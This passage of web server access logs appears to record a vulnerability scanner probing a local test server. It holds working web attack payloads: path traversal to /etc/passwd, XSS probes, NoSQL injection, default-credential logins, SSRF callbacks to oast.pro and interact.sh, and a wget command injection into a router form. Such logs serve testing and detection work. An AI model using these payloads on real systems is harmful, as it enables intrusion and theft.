+0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..;/examples/jsp/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?page=../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"csrfmiddlewaretoken={{csrfmiddlewaretoken}}&username=hadoop&password=hadoop&next=%2F","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /hue/accounts/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /SolarWinds/InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Items/RemoteSearch/Image?ImageUrl=http://c9v8gvgsmpv8bafg0t00oeh4u7afaxi9c.oast.pro&ProviderName=TheMovieDB HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/UI/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children....4.2.1....json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hopfully404 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /r2w/signIn.do?urll=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"csrfmiddlewaretoken={{csrfmiddlewaretoken}}&username=cloudera&password=cloudera&next=%2F","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /hue/accounts/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.vscode/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"{\x0D\x0A \x22auth\x22: {\x0D\x0A \x22user\x22: {\x0D\x0A \x22$eq\x22: \x22admin\x22\x0D\x0A },\x0D\x0A \x22password\x22: [\x0D\x0A 0\x0D\x0A ]\x0D\x0A }\x0D\x0A}\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /auth/check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/UI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children.json?FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/eatery/nav.php?-Menu-=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WebConsole/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:34 +0000","request_body":"{{name}}=glpi&{{password}}=glpi&auth=local&submit=Submit&_glpi_csrf_token={{token}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /front/login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=dff1db99c9ecc3c645a4239e20e8ba32 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/v1/AccountService/Accounts HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children.json?FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /s/297MPNNOd7shsWzyFaS8E75BVqw/_/;/WEB-INF/web.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVendor HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.000","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/search/..%5C..%5C..%5Cconf%5Copenfire.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_matamko&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children.json?FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /opensis/ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /owncloud/config/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/snapshots/:key HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.000","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"aws.interact.sh","request":"GET http://aws.interact.sh/metadata/instance?api-version=2021-02-01 HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.554","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?wp_nlm=confirmation&appurl=aHR0cDovL2F0dGFja2VyLmNvbQ== HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.005","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..;/examples/websocket/index.xhtml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.087","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /oauth/authorize?response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://test HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"admuser=admin&admpass=;wget http://c9v8gvgsmpv8bafg0t00387rnzwrzc5md.oast.pro;&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /goform/setSysAdm HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.089","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"http://127.0.0.1/login.shtml", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /hue/assets/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2fpasswd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.000","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /../../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /assets/img/favicon-32x32.png HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.086","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /loginLess/../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"fldr=&url=file:///etc/passwd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /filemanager/upload.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.087","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /SSI/index.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /security/hostSignon.do?hostSignOn=true&servProvCode=k3woq%22%5econfirm(document.domain)%5e%22a2pbrnzx5a9 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.089","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Umbraco/feedproxy.aspx?url=http://c9v8gvgsmpv8bafg0t00jkdjjksqeu7ao.oast.pro HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVendor HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/reporter/view_server_log.php?act=stats&filename=log&offset=1&count=1&sortorder=0&filter=0&log=../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/UI/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.088","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /general/status.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?mp_idx=%22;alert(%271%27);// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sitecore/login/default.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.101","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVersion HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /modules/system/assets/js/framework.combined-min.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", 